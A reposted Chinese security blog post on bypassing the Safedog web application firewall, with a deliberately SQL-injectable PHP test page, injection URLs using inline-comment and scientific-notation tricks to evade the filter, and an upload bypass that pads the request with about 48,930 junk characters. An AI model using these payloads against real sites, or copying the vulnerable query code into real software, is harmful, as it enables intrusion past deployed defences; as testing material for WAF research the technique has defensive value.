作者是谁不清楚,看到群里分享出来的,所以转载到博客了。-----收集整理 by: www.nvhack.com
安全狗SQL注入绕过
- 测试文件,明显的字符型 SQL 注入
<?php header("Content-type: text/html; charset=utf-8"); $link = mysql_connect("localhost","root","root"); mysql_select_db("test",$link); $sql = "select * from cms where id='{$_GET['id']}'"; echo $sql; echo '<br>-----------------------------<br>'; $res = mysql_query($sql); while ( $rows = mysql_fetch_array($res)) { echo $rows[0]; echo $rows[1]; echo $rows[2]; } ?>
- 正常运行界面
- 添加注入测试语句
http://localhost/waf123.php?id=3' and 1=1 --+
- 修改测试语句
http://localhost/waf123.php?id=3'/*!and*/%202e1/**/=2e1--+
安全狗上传绕过
- 附上 php 上传脚本源码,此源码未对上传文件类型做校验
- 绕过方法,工具:burpsuite 1,用 php 脚本或者 js,python 等其他语言,生成 48930 个字符
<?php for ($i=0; $i <= 48930; $i++) { echo 'o'; } ?>
- 抓包,改包
- 添加后如图
- 查看当前目录,上传成功 1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论